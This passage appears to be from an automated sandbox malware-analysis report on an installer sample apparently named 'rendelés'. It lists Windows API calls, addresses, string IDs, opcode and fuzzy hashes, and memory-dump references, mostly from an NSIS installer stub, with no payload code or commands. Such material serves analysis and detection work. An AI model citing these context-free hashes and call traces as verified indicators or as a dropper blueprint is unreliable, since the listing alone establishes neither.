                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                • API String ID: 2171350718-2295842750
                                                                • Opcode ID: 4614d034e2a0d51c3182c1dc66dc3f17e33e4efb28174d4dcb2b9d1eb40c95ca
                                                                • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                • Opcode Fuzzy Hash: 4614d034e2a0d51c3182c1dc66dc3f17e33e4efb28174d4dcb2b9d1eb40c95ca
                                                                • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                • API String ID: 941294808-1304234792
                                                                • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                • lstrcmpiW.KERNEL32(00428200,00423748,00000000,?,?), ref: 00404C1C
                                                                • lstrcatW.KERNEL32(?,00428200), ref: 00404C28
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                  • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406952
                                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,00437800,00437800,00403923), ref: 00406961
                                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406966
                                                                  • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406979
                                                                • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                  • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                  • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                  • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: A$H7B
                                                                • API String ID: 2624150263-4206748285
                                                                • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004030E4
                                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00403100
                                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,00438800,80000000,00000003), ref: 0040615C
                                                                  • Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00403149
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040328B
                                                                Strings
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
                                                                • Error launching installer, xrefs: 00403120
                                                                • Null, xrefs: 004031C7
                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
                                                                • Inst, xrefs: 004031B5
                                                                • soft, xrefs: 004031BE
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 2803837635-787788815
                                                                • Opcode ID: 4cb08800c77b72374b2b0a19fee77801a5306982be649b08a3b913b7ae7a0f40
                                                                • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                • Opcode Fuzzy Hash: 4cb08800c77b72374b2b0a19fee77801a5306982be649b08a3b913b7ae7a0f40
                                                                • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(00428200,00000400), ref: 004067C0
                                                                • GetWindowsDirectoryW.KERNEL32(00428200,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                • lstrcatW.KERNEL32(00428200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                • lstrlenW.KERNEL32(00428200,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 4260037668-730719616
                                                                • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                APIs
                                                                • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(00428200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(00428200,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                • String ID: ('B
                                                                • API String ID: 1495540970-2332581011
                                                                • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                • GetSysColor.USER32(00000000), ref: 00404686
                                                                • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                • GetSysColor.USER32(?), ref: 004046B1
                                                                • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                • DeleteObject.GDI32(?), ref: 004046DB
                                                                • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                  • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                • String ID: 9
                                                                • API String ID: 163830602-2366072709
                                                                • Opcode ID: 8f423b3a6fac41f253a82e701da8ff5cc6babda61d7ffc9716fc01ec4a97d53e
                                                                • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                • Opcode Fuzzy Hash: 8f423b3a6fac41f253a82e701da8ff5cc6babda61d7ffc9716fc01ec4a97d53e
                                                                • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                APIs
                                                                • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                • GetTickCount.KERNEL32 ref: 00403067
                                                                • wsprintfW.USER32 ref: 00403095
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                  • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                • String ID: ... %d%%
                                                                • API String ID: 722711167-2449383134
                                                                • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                • GetMessagePos.USER32 ref: 00404FA2
                                                                • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                • wsprintfW.USER32 ref: 00406A17
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                • wsprintfW.USER32 ref: 00402FE5
                                                                • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                • API String ID: 1451636040-1158693248
                                                                • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-1273862796
                                                                • Opcode ID: 1b136c67510ab8a41e829b8ea57123c1d4707d468828aa933efbed8b6a08878c
                                                                • Instruction ID: 755dd782ec4f9138a2913a65e187945492569b51939de05f6bd0644a1a3a30e1
                                                                • Opcode Fuzzy Hash: 1b136c67510ab8a41e829b8ea57123c1d4707d468828aa933efbed8b6a08878c
                                                                • Instruction Fuzzy Hash: 8B915F34A00209DFEB18DF69D594BAE77F6BF44344F1085A9E402AB355DBB4DD42CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-981061697
                                                                • Opcode ID: 4cbd2eedb932f27e00ded956e4f9f36b39dcf41f2bd23baa1fb61492c24c04e2
                                                                • Instruction ID: 1427ffae48fe6fe51ff4402223691bc6cf52b2bacb32aa8c5e16ade325349286
                                                                • Opcode Fuzzy Hash: 4cbd2eedb932f27e00ded956e4f9f36b39dcf41f2bd23baa1fb61492c24c04e2
                                                                • Instruction Fuzzy Hash: 7DF12A74A00204DFDB19EFA4C594A9EB7F7FF88301F248569D406AB369CB75AC82CB40
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                • Opcode ID: 00347aaa704c41d4c46baa316378e6427cafe3832f033c65b94efe24e55f9f1d
                                                                • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                • Opcode Fuzzy Hash: 00347aaa704c41d4c46baa316378e6427cafe3832f033c65b94efe24e55f9f1d
                                                                • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                APIs
                                                                • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                • wsprintfW.USER32 ref: 00404F1B
                                                                • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
